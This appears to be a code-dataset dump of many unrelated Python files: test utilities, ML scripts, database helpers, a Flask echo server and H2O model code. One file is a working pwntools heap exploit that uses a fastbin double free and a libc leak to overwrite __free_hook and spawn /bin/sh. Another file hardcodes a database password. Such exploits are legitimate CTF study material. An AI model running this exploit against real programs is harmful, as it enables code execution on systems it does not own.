content
stringlengths 5
1.05M
|
---|
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""argparse.ArgumentParser for the mini_installer test suite.
The provided parser is based on that created by typ.
"""
import typ
def ArgumentParser(host=None):
"""Returns an argparse.ArgumentParser for the mini_installer test suite.
Args:
host: A typ.Host to pass to typ's argument parser.
Returns:
A filled out ArgumentParser instance.
"""
parser = typ.ArgumentParser(host)
group = parser.add_argument_group(title='run_mini_installer_tests')
group.add_argument('--force-clean',
action='store_true',
default=False,
help='Force cleaning existing installations')
group.add_argument(
'--output-dir',
metavar='DIR',
help='Directory into which crash dumps and other output '
' files are to be written')
group.add_argument('--installer-path',
default='mini_installer.exe',
metavar='FILENAME',
help='The path of the installer.')
group.add_argument('--previous-version-installer-path',
default='previous_version_mini_installer.exe',
metavar='FILENAME',
help='The path of the previous version installer.')
group.add_argument('--chromedriver-path',
default='chromedriver.exe',
help='The path to chromedriver.')
group.add_argument('--config',
default='config.config',
metavar='FILENAME',
help='Path to test configuration file')
return parser
|
import random
import sys
import pandas as pd
import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn.tree import DecisionTreeRegressor
from sklearn.svm import SVR
from data_prepare import make_data,make_data_2th
from algo_utils import *
np.random.seed(0)
random.seed(0)
# global params
#
train_task_rows = 2000
test_task_rows = 2000
true_C = 5 # 测试任务的 task id
base_learner = DecisionTreeRegressor # 使用何种基学习器
# make data
train = make_data(9,train_task_rows)
test = make_data(1,test_task_rows,alphas=[true_C])
train = make_data_2th(10, 2000, data_scene=[4,4,4,12,1,2,1])
test = make_data_2th(1, 2000, data_scene=[4,4,4,12,1,2,1])
# OLS linear regression
print(" *** baseline 全局模型 *** ")
# 训练模型
model = prediction_pipeline(train,base_learner)
# 测试模型
_,mse = prediction_pipeline(test,fitted=model,output="y_hat")
print("MSE")
print(mse)
if base_learner == LinearRegression:
print("系数:",model.coef_)
print("截距项:",model.intercept_)
basemse = mse
# 本文提出的方法
print("=" * 88)
print(" *** 本文方法 新模型 *** ")
# 训练模型
newmodel = prediction_pipeline(train,ProModel,task_rows=train_task_rows,
base_learner = base_learner,distance_metrics = muti_js_micro,verbose = True)
# 测试模型
r,mse = prediction_pipeline(test,fitted=newmodel,output="y_hat")
mse_2 = mse
print("MSE")
print(mse)
print("_scores",newmodel._scores)
print("_task_num",newmodel.task_num)
print("base_mse",basemse)
if base_learner == LinearRegression:
for i in range(9):
print("第" + str(i) +"个任务:系数:",newmodel._base_learners[i].coef_)
print(newmodel._X[0].shape)
print(newmodel._X[0].columns)
print("=" * 88)
# 单个模型
print(" *** 单个模型 *** ")
model = prediction_pipeline(train[0000 + int(2000 * (true_C-1)):2000 + int(2000 * (true_C-1))],LinearRegression)
_,mse = prediction_pipeline(test,fitted=model,output="y_hat")
mse_3 = mse
print("MSE")
print(mse)
print("系数:",model.coef_)
print("/")
print("全局模型,本文模型,真实单任务模型的mse分别为:",basemse,",",mse_2,",",mse_3)
print("=" * 88) |
from .group_chat_bot import WeGroupChatBot as GroupChatBot, WeGroupChatBots as GroupChatBots
|
from sqlalchemy import Column, create_engine, DateTime, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import scoped_session, sessionmaker
Base = declarative_base()
class Pet(Base):
__tablename__ = "pets"
id = Column(String(20), primary_key=True)
name = Column(String(100))
animal_type = Column(String(20))
created = Column(DateTime())
def update(self, id=None, name=None, animal_type=None, tags=None, created=None):
if name is not None:
self.name = name
if animal_type is not None:
self.animal_type = animal_type
if created is not None:
self.created = created
def dump(self):
return {k: v for k, v in vars(self).items() if not k.startswith("_")}
def init_db(uri):
engine = create_engine(uri, convert_unicode=True)
db_session = scoped_session(sessionmaker(autocommit=False, autoflush=False, bind=engine))
Base.query = db_session.query_property()
Base.metadata.create_all(bind=engine)
return db_session
|
from datetime import date, datetime
from pynonymizer.database.exceptions import UnsupportedColumnStrategyError
from pynonymizer.strategy.update_column import UpdateColumnStrategyTypes
from pynonymizer.fake import FakeDataType
"""
All Static query generation functions
"""
_FAKE_COLUMN_TYPES = {
FakeDataType.STRING: "VARCHAR(65535)",
FakeDataType.DATE: "DATE",
FakeDataType.DATETIME: "DATETIME",
FakeDataType.INT: "INT"
}
# Random text function
_RAND_MD5 = "md5(random()::text)"
def _get_sql_type(data_type):
return _FAKE_COLUMN_TYPES[data_type]
def _get_column_subquery(seed_table_name, column_strategy):
if column_strategy.strategy_type == UpdateColumnStrategyTypes.EMPTY:
return "('')"
elif column_strategy.strategy_type == UpdateColumnStrategyTypes.UNIQUE_EMAIL:
return f"( SELECT CONCAT({_RAND_MD5}, '@', {_RAND_MD5}, '.com') WHERE \"updatetarget\"=\"updatetarget\" )"
elif column_strategy.strategy_type == UpdateColumnStrategyTypes.UNIQUE_LOGIN:
return f"( SELECT {_RAND_MD5} WHERE \"updatetarget\"=\"updatetarget\" )"
elif column_strategy.strategy_type == UpdateColumnStrategyTypes.FAKE_UPDATE:
# Add a dummy "updatetarget" where clause to fool the postgres optimizer into running the subquery on every row
# instead of once for the whole query
# See Also https://www.simononsoftware.com/problem-with-random-in-postgresql-subselect/
return f"( SELECT {column_strategy.qualifier} FROM {seed_table_name} WHERE \"updatetarget\"=\"updatetarget\" ORDER BY RANDOM() LIMIT 1)"
elif column_strategy.strategy_type == UpdateColumnStrategyTypes.LITERAL:
return column_strategy.value
else:
raise UnsupportedColumnStrategyError(column_strategy)
def _escape_sql_value(value):
"""
return a sql-ified version of a seed column's value
Normally this defines the stringification of datatypes and escaping for strings
"""
if isinstance(value, (str, datetime, date)):
return "'" + str(value).replace("'", "''") + "'"
else:
return str(value)
def _get_qualified_table_name(schema, table):
return f"{schema}.{table}" if schema else table
def get_truncate_table(table_strategy):
return f"TRUNCATE TABLE {_get_qualified_table_name(table_strategy.schema, table_strategy.table_name)} CASCADE;"
# postgres truncates can cascade and are faster than unqualified deletes
# https://www.postgresql.org/docs/9.1/sql-truncate.html
def get_delete_table(table_strategy):
return f"TRUNCATE TABLE {_get_qualified_table_name(table_strategy.schema, table_strategy.table_name)} CASCADE;"
def get_create_seed_table(table_name, qualifier_map):
if len(qualifier_map) < 1:
raise ValueError("Cannot create a seed table with no columns")
create_columns = [f"{qualifier} {_get_sql_type(strategy.data_type)}" for qualifier, strategy in qualifier_map.items()]
return "CREATE TABLE {} ({});".format(table_name, ",".join(create_columns) )
def get_drop_seed_table(table_name):
return f"DROP TABLE IF EXISTS {table_name};"
def get_insert_seed_row(table_name, qualifier_map):
column_names = ",".join( [f"{qualifier}" for qualifier in qualifier_map.keys()] )
column_values = ",".join( [f"{_escape_sql_value(strategy.value)}" for strategy in qualifier_map.values()] )
return "INSERT INTO {}({}) VALUES ({});".format(table_name, column_names, column_values)
def get_create_database(database_name):
return f"CREATE DATABASE {database_name};"
def get_drop_database(database_name):
return [
# terminate other connections so we can drop
f"SELECT pid, pg_terminate_backend(pid) FROM pg_stat_activity WHERE datname = '{database_name}' AND pid != pg_backend_pid();",
f"DROP DATABASE IF EXISTS {database_name};"
]
def get_update_table(seed_table_name, update_table_strategy):
# group on where_condition
# build lists of update statements based on the where
output_statements = []
where_update_statements = {}
for where, column_map in update_table_strategy.group_by_where().items():
where_update_statements[where] = []
for column_name, column_strategy in column_map.items():
where_update_statements[where].append("{} = {}".format(
column_name,
_get_column_subquery(seed_table_name, column_strategy))
)
assignments = ",".join( where_update_statements[where] )
where_clause = f" WHERE {where}" if where else ""
output_statements.append(
"UPDATE {} AS \"updatetarget\" SET {}{};".format(
_get_qualified_table_name(update_table_strategy.schema, update_table_strategy.table_name),
assignments,
where_clause
)
)
return output_statements
# TODO: fix for postgres
def get_dumpsize_estimate(database_name):
return "SELECT 1;"
|
#from __future__ import print_function
import json
from flask import Flask, request, redirect, make_response
app = Flask(__name__)
app.debug = True
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def index(path):
s = "<html><pre>"
f = "</pre></html>"
sep = '\n============================\n'
p = "Path: " + path + "\n"
arg = str(json.dumps(request.args, sort_keys=True, indent=4, separators=(',', ': ')))
dat = str(request.data)
final = s + p + sep + str(request.headers) + sep + arg + sep + dat + f
return(final)
if __name__ == '__main__':
app.run(port=3001,host='0.0.0.0')
|
#!/usr/bin/env python
from minibus import MiniBusTwistedClient
import sys
sys.DONT_WRITE_BYTECODE = True
class ServiceServer(MiniBusTwistedClient):
def __init__(self):
MiniBusTwistedClient.__init__(self, name="ServiceServer")
self.service_func_server("echoback", { }, { }, self.echo)
def echo(self, data):
print "got", data
if data[0].lower() == "x":
raise Exception("I don't like x")
return "I said '%s'" % data
if __name__ == "__main__":
server = ServiceServer()
server.exec_()
|
# This program is free software; you can redistribute it and/or modify it under
# the terms of the (LGPL) GNU Lesser General Public License as published by the
# Free Software Foundation; either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Library Lesser General Public License
# for more details at ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( [email protected] )
"""
Provides classes for handling soap multirefs.
"""
from suds import *
from suds.sax.element import Element
soapenc = (None, 'http://schemas.xmlsoap.org/soap/encoding/')
class MultiRef:
"""
Resolves and replaces multirefs.
@ivar nodes: A list of non-multiref nodes.
@type nodes: list
@ivar catalog: A dictionary of multiref nodes by id.
@type catalog: dict
"""
def __init__(self):
self.nodes = []
self.catalog = {}
def process(self, body):
"""
Process the specified soap envelope body and replace I{multiref} node
references with the contents of the referenced node.
@param body: A soap envelope body node.
@type body: L{Element}
@return: The processed I{body}
@rtype: L{Element}
"""
self.nodes = []
self.catalog = {}
self.build_catalog(body)
self.update(body)
body.children = self.nodes
return body
def update(self, node):
"""
Update the specified I{node} by replacing the I{multiref} references with
the contents of the referenced nodes and remove the I{href} attribute.
@param node: A node to update.
@type node: L{Element}
@return: The updated node
@rtype: L{Element}
"""
self.replace_references(node)
for c in node.children:
self.update(c)
return node
def replace_references(self, node):
"""
Replacing the I{multiref} references with the contents of the
referenced nodes and remove the I{href} attribute. Warning: since
the I{ref} is not cloned,
@param node: A node to update.
@type node: L{Element}
"""
href = node.getAttribute('href')
if href is None:
return
id = href.getValue()
ref = self.catalog.get(id)
if ref is None:
import logging
log = logging.getLogger(__name__)
log.error('soap multiref: %s, not-resolved', id)
return
node.append(ref.children)
node.setText(ref.getText())
for a in ref.attributes:
if a.name != 'id':
node.append(a)
node.remove(href)
def build_catalog(self, body):
"""
Create the I{catalog} of multiref nodes by id and the list of
non-multiref nodes.
@param body: A soap envelope body node.
@type body: L{Element}
"""
for child in body.children:
if self.soaproot(child):
self.nodes.append(child)
id = child.get('id')
if id is None: continue
key = '#%s' % id
self.catalog[key] = child
def soaproot(self, node):
"""
Get whether the specified I{node} is a soap encoded root.
This is determined by examining @soapenc:root='1'.
The node is considered to be a root when the attribute
is not specified.
@param node: A node to evaluate.
@type node: L{Element}
@return: True if a soap encoded root.
@rtype: bool
"""
root = node.getAttribute('root', ns=soapenc)
if root is None:
return True
else:
return ( root.value == '1' )
|
"""
Main module of the server file
"""
# 3rd party moudles
from flask import render_template
# local modules
import app_config
# Get the application instance
connex_app = app_config.connex_app
# Read the swagger.yml file to configure the endpoints
connex_app.add_api("swagger.yaml", strict_validation=True,
pythonic_params=True)
# create a URL route in our application for "/"
@connex_app.route("/")
def home():
"""
This function just responds to the browser URL
localhost:5000/
:return: the rendered template "home.html"
"""
return render_template("home.html")
if __name__ == "__main__":
connex_app.run(debug=True)
|
#!/usr/bin/env python
from pwn import *
def add_note(title, content_size, content):
p.sendline('1')
p.recvuntil('please input title: ')
p.send(title)
p.recvuntil('please input content size: ')
p.sendline(str(content_size))
p.recvuntil('please input content: ')
p.send(content)
def view_note(title):
p.sendline('2')
p.recvuntil('please input note title: ')
p.send(title)
def edit_note(title, content):
p.sendline('3')
p.recvuntil('please input note title: ')
p.send(title)
p.recvuntil('please input new content: ')
p.send(content)
def delete_note(title):
p.sendline('4')
p.recvuntil('please input note title: ')
p.send(title)
with context.quiet:
p = process('./program', env = {'LD_PRELOAD': './libc-2.23.so'})
p.recvuntil('5. Exit\n')
# allocates fastbin_1 and fastbin_2
add_note('a' * 8, 24, 'a' * 24)
# frees fastbin_1 and fastbin_2
delete_note('a' * 8)
# frees fastbin_1 and fastbin_2 again
# this puts fastbin_1 and fastbin_2 address on the free list again
# https://github.com/shellphish/how2heap/blob/master/fastbin_dup.c
delete_note('a' * 8)
# allocates fastbin_3 and fastbin_4
# we provide all zero title, so makes the fd pointer = 0
add_note('\x00' * 8, 24, 'b' * 24)
# allocates fastbin_5 and smallbin_1
# this causes fastbin_5 overlaps with fastbin_3
# both notes are pointing to the same location
add_note('c' * 8, 256, 'c' * 256)
# allocates fastbin_6 and fastbin_7
# prevents smallbin_1 being consolidated into the top chunk
add_note('d' * 8, 24, 'd' * 24)
# frees fastbin_5
# frees smallbin_1 and populate its fd and bk pointers with libc addresses
delete_note('c' * 8)
# print content of fastbin_3 since its content is the same as fastbin_5
view_note('\x00' * 8)
# leak libc address
p.recvuntil('note content: ')
libc_base = u64(p.recv(6) + '\x00\x00') - 0x3c4b78
print 'libc base: {}'.format(hex(libc_base))
# frees fastbin_6 and fastbin_7
delete_note('d' * 8)
# allocates fastbin_8 and smallbin_2
# smallbin_1 and smallbin_2 overlap
add_note('e' * 8, 256, 'e' * 256)
# allocates fastbin_9 and fastbin_10
# fastbin_10 and fastbin_5 overlap
# basically, fastbin_5 is the content of this note
# therefore, we can overwrite the content address with __free_hook
add_note('f' * 8, 24, '\x00' * 8 + p64(24) + p64(libc_base + 0x3c67a8))
# we then overwrite __free_hook with the address of onegadet's execve
# 0x4526a execve("/bin/sh", rsp+0x30, environ)
# constraints:
# [rsp+0x30] == NULL
edit_note('\x00' * 7 + '\n', p64(libc_base + 0x4526a) + '\n')
# trigger the __free_hook by freeing a note
delete_note('\x00' * 8)
p.interactive()
|
from torch.utils.data import DataLoader
from typing import NamedTuple
class Loaders(NamedTuple):
"""
Container for the data loaders
"""
train: DataLoader
test: DataLoader
|
"""
day4-part1.py
Created on 2020-12-04
Updated on 2020-12-09
Copyright © Ryan Kan
"""
# INPUT
with open("input.txt", "r") as f:
contents = f.read()[:-1]
passports = [passport.replace("\n", " ") for passport in contents.split("\n\n")]
f.close()
# COMPUTATION
# Process each passport
noValid = 0
for passport in passports:
# Convert each passport into a dictionary of sorts
dictionary = {}
entries = passport.split(" ")
for entry in entries:
key, value = entry.split(":")
dictionary[key] = value
# Remove the "cid" key since it is optional
try:
dictionary.pop("cid")
except KeyError:
pass
# Check if all required fields are there
if set(dictionary.keys()) == {"byr", "iyr", "eyr", "hgt", "hcl", "ecl", "pid"}:
noValid += 1
# OUTPUT
print(noValid)
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.orchestration.kubeflow.base_component."""
import json
import os
from absl import logging
from kfp import dsl
import tensorflow as tf
from tfx.components.example_gen.csv_example_gen import component as csv_example_gen_component
from tfx.components.statistics_gen import component as statistics_gen_component
from tfx.orchestration import data_types
from tfx.orchestration import pipeline as tfx_pipeline
from tfx.orchestration.kubeflow import base_component
from tfx.orchestration.kubeflow.proto import kubeflow_pb2
from tfx.proto.orchestration import pipeline_pb2
from ml_metadata.proto import metadata_store_pb2
class BaseComponentTest(tf.test.TestCase):
maxDiff = None # pylint: disable=invalid-name
_test_pipeline_name = 'test_pipeline'
def setUp(self):
super().setUp()
example_gen = csv_example_gen_component.CsvExampleGen(
input_base='data_input')
statistics_gen = statistics_gen_component.StatisticsGen(
examples=example_gen.outputs['examples']).with_id('foo')
pipeline = tfx_pipeline.Pipeline(
pipeline_name=self._test_pipeline_name,
pipeline_root='test_pipeline_root',
metadata_connection_config=metadata_store_pb2.ConnectionConfig(),
components=[example_gen, statistics_gen],
)
test_pipeline_root = dsl.PipelineParam(name='pipeline-root-param')
self._metadata_config = kubeflow_pb2.KubeflowMetadataConfig()
self._metadata_config.mysql_db_service_host.environment_variable = 'MYSQL_SERVICE_HOST'
self._tfx_ir = pipeline_pb2.Pipeline()
with dsl.Pipeline('test_pipeline'):
self.component = base_component.BaseComponent(
component=statistics_gen,
depends_on=set(),
pipeline=pipeline,
pipeline_root=test_pipeline_root,
tfx_image='container_image',
kubeflow_metadata_config=self._metadata_config,
tfx_ir=self._tfx_ir,
pod_labels_to_attach={},
runtime_parameters=[]
)
self.tfx_component = statistics_gen
def testContainerOpArguments(self):
# TODO(hongyes): make the whole args list in one golden file to keep
# source of truth in same file.
source_data_dir = os.path.join(os.path.dirname(__file__), 'testdata')
with open(os.path.join(source_data_dir,
'component.json')) as component_json_file:
formatted_component_json = json.dumps(
json.load(component_json_file), sort_keys=True)
expected_args = [
'--pipeline_root',
'{{pipelineparam:op=;name=pipeline-root-param}}',
'--kubeflow_metadata_config',
'{\n'
' "mysql_db_service_host": {\n'
' "environment_variable": "MYSQL_SERVICE_HOST"\n'
' }\n'
'}',
'--node_id',
'foo',
]
try:
self.assertEqual(
self.component.container_op.arguments[:len(expected_args)],
expected_args)
except AssertionError:
# Print out full arguments for debugging.
logging.error('==== BEGIN CONTAINER OP ARGUMENT DUMP ====')
logging.error(json.dumps(self.component.container_op.arguments, indent=2))
logging.error('==== END CONTAINER OP ARGUMENT DUMP ====')
raise
def testContainerOpName(self):
self.assertEqual('foo', self.tfx_component.id)
self.assertEqual('foo', self.component.container_op.name)
class BaseComponentWithPipelineParamTest(tf.test.TestCase):
"""Test the usage of RuntimeParameter."""
maxDiff = None # pylint: disable=invalid-name
_test_pipeline_name = 'test_pipeline'
def setUp(self):
super().setUp()
example_gen_output_config = data_types.RuntimeParameter(
name='example-gen-output-config', ptype=str)
example_gen = csv_example_gen_component.CsvExampleGen(
input_base='data_root', output_config=example_gen_output_config)
statistics_gen = statistics_gen_component.StatisticsGen(
examples=example_gen.outputs['examples']).with_id('foo')
test_pipeline_root = dsl.PipelineParam(name='pipeline-root-param')
pipeline = tfx_pipeline.Pipeline(
pipeline_name=self._test_pipeline_name,
pipeline_root='test_pipeline_root',
metadata_connection_config=metadata_store_pb2.ConnectionConfig(),
components=[example_gen, statistics_gen],
)
self._metadata_config = kubeflow_pb2.KubeflowMetadataConfig()
self._metadata_config.mysql_db_service_host.environment_variable = 'MYSQL_SERVICE_HOST'
self._tfx_ir = pipeline_pb2.Pipeline()
with dsl.Pipeline('test_pipeline'):
self.example_gen = base_component.BaseComponent(
component=example_gen,
depends_on=set(),
pipeline=pipeline,
pipeline_root=test_pipeline_root,
tfx_image='container_image',
kubeflow_metadata_config=self._metadata_config,
tfx_ir=self._tfx_ir,
pod_labels_to_attach={},
runtime_parameters=[example_gen_output_config])
self.statistics_gen = base_component.BaseComponent(
component=statistics_gen,
depends_on=set(),
pipeline=pipeline,
pipeline_root=test_pipeline_root,
tfx_image='container_image',
kubeflow_metadata_config=self._metadata_config,
tfx_ir=self._tfx_ir,
pod_labels_to_attach={},
runtime_parameters=[]
)
self.tfx_example_gen = example_gen
self.tfx_statistics_gen = statistics_gen
def testContainerOpArguments(self):
# TODO(hongyes): make the whole args list in one golden file to keep
# source of truth in same file.
source_data_dir = os.path.join(os.path.dirname(__file__), 'testdata')
statistics_gen_expected_args = [
'--pipeline_root',
'{{pipelineparam:op=;name=pipeline-root-param}}',
'--kubeflow_metadata_config',
'{\n'
' "mysql_db_service_host": {\n'
' "environment_variable": "MYSQL_SERVICE_HOST"\n'
' }\n'
'}',
'--node_id',
'foo',
'--tfx_ir',
'{}',
]
example_gen_expected_args = [
'--pipeline_root',
'{{pipelineparam:op=;name=pipeline-root-param}}',
'--kubeflow_metadata_config',
'{\n'
' "mysql_db_service_host": {\n'
' "environment_variable": "MYSQL_SERVICE_HOST"\n'
' }\n'
'}',
'--node_id',
'CsvExampleGen',
'--tfx_ir',
'{}',
'--runtime_parameter',
'example-gen-output-config=STRING:{{pipelineparam:op=;name=example-gen-output-config}}',
]
try:
self.assertEqual(
self.statistics_gen.container_op
.arguments,
statistics_gen_expected_args)
self.assertEqual(
self.example_gen.container_op.arguments,
example_gen_expected_args)
except AssertionError:
# Print out full arguments for debugging.
logging.error('==== BEGIN STATISTICSGEN CONTAINER OP ARGUMENT DUMP ====')
logging.error(
json.dumps(self.statistics_gen.container_op.arguments, indent=2))
logging.error('==== END STATISTICSGEN CONTAINER OP ARGUMENT DUMP ====')
logging.error('==== BEGIN EXAMPLEGEN CONTAINER OP ARGUMENT DUMP ====')
logging.error(
json.dumps(self.example_gen.container_op.arguments, indent=2))
logging.error('==== END EXAMPLEGEN CONTAINER OP ARGUMENT DUMP ====')
raise
def testContainerOpName(self):
self.assertEqual('foo', self.tfx_statistics_gen.id)
self.assertEqual('foo', self.statistics_gen.container_op.name)
if __name__ == '__main__':
tf.test.main()
|
from signal import signal, SIGINT
from sys import exit
import psycopg2
import airly
from getkey import getkey, keys
import write_on_display
import bme280
import smbus2
import datetime
from time import sleep
conn = psycopg2.connect(
host="localhost",
database="weather_station",
user="dev",
password="d3v")
insert_measure_sql = """
insert into measure (temperature, pressure, humidity, outside_temp, pm_2_5, pm_10, caqi, meter_id)
values (%s, %s, %s, %s, %s, %s, %s, %s)
returning id
"""
airly_last_read = datetime.datetime.now()-datetime.timedelta(minutes=30)
caqi = 0
port = 1
address = 0x76
bus = smbus2.SMBus(port)
bme280.load_calibration_params(bus, address)
write_on_display.write('Initiating\nsystems...')
sleep(1)
def handler(signal_received, frame):
# Handle any cleanup here
print('SIGINT or CTRL-C detected. Exiting gracefully')
write_on_display.clear()
f.close()
conn.close()
exit(0)
if __name__ == '__main__':
signal(SIGINT, handler)
while True:
if airly_last_read < datetime.datetime.now()-datetime.timedelta(minutes=20):
airlyData = airly.getData()
caqiRaw = airlyData["current"]["indexes"][0]["value"]
caqi = round(caqiRaw)
outside_temp = airlyData["current"]["values"][5]["value"]
pm_2_5 = airlyData["current"]["values"][1]["value"]
pm_10 = airlyData["current"]["values"][2]["value"]
airly_last_read = datetime.datetime.now()
bme280_data = bme280.sample(bus, address)
humidity = round(bme280_data.humidity)
humidity2 = bme280_data.humidity
pressure = round(bme280_data.pressure)
pressure2 = bme280_data.pressure
temperature = round(bme280_data.temperature)
temperature2 = bme280_data.temperature
msg = f'H:{humidity}% {temperature}\u00b0C\nhPa:{pressure}\nCAQI:{caqi} {outside_temp}\u00b0C'
write_on_display.write(msg)
time = datetime.datetime.now()
f = open("weather.log", "a")
f.write(f'{time};{humidity2};{pressure2};{temperature2};{caqiRaw};{outside_temp};{pm_2_5};{pm_10}\n')
cur = conn.cursor()
cur.execute(insert_measure_sql, (temperature2, pressure2, humidity2, outside_temp, pm_2_5, pm_10, caqiRaw, 2))
conn.commit()
cur.close()
f.close()
sleep(60*5)
|
from django.test import TestCase
from medicus import models as medi_models
class TestRating(TestCase):
def test_000_new_rating(self):
country = medi_models.Country.objects.create(name='Rumania')
province = medi_models.Province.objects.create(country=country, name='bla')
postal_code = medi_models.PostalCode.objects.create(postal_code=1234)
city = medi_models.City.objects.create(postal_code=postal_code, country=country, province=province, name='some city')
address = medi_models.Address.objects.create(
city=city,
country=country,
street='some_street',
house_number='123'
)
profession = medi_models.Profession.objects.create(name='bla')
doc = medi_models.Doctor.objects.create(name='dr. alibert', address=address, profession=profession)
rating = medi_models.Rating(treatment=1,
empathy=1,
price=1,
waiting_time=1,
doctor=doc)
rating.full_clean()
rating.save()
self.assertEquals(rating.general_score, 1)
|
"""
Binomial Models
"""
from metrics_base import *
class H2OBinomialModel(ModelBase):
"""
Class for Binomial models.
"""
def __init__(self, dest_key, model_json):
"""
Create a new binomial model.
"""
super(H2OBinomialModel, self).__init__(dest_key, model_json,H2OBinomialModelMetrics)
def F1(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the F1 for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the F1 value for the training data.
:param valid: If valid is True, then return the F1 value for the validation data.
:param xval: If xval is True, then return the F1 value for the cross validation data.
:return: The F1 for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("f1", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def F2(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the F2 for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the F2 value for the training data.
:param valid: If valid is True, then return the F2 value for the validation data.
:param xval: If xval is True, then return the F2 value for the cross validation data.
:return: The F2 for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("f2", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def F0point5(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the F0.5 for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the F0point5 value for the training data.
:param valid: If valid is True, then return the F0point5 value for the validation data.
:param xval: If xval is True, then return the F0point5 value for the cross validation data.
:return: The F0point5 for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("f0point5", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def accuracy(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the accuracy for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the accuracy value for the training data.
:param valid: If valid is True, then return the accuracy value for the validation data.
:param xval: If xval is True, then return the accuracy value for the cross validation data.
:return: The accuracy for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("accuracy", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def error(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the error for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the error value for the training data.
:param valid: If valid is True, then return the error value for the validation data.
:param xval: If xval is True, then return the error value for the cross validation data.
:return: The error for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else [[acc[0],1-acc[1]] for acc in v.metric("accuracy", thresholds=thresholds)]
return m.values()[0] if len(m) == 1 else m
def precision(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the precision for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the precision value for the training data.
:param valid: If valid is True, then return the precision value for the validation data.
:param xval: If xval is True, then return the precision value for the cross validation data.
:return: The precision for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("precision", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def tpr(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the True Positive Rate for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the tpr value for the training data.
:param valid: If valid is True, then return the tpr value for the validation data.
:param xval: If xval is True, then return the tpr value for the cross validation data.
:return: The tpr for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("tpr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def tnr(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the True Negative Rate for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
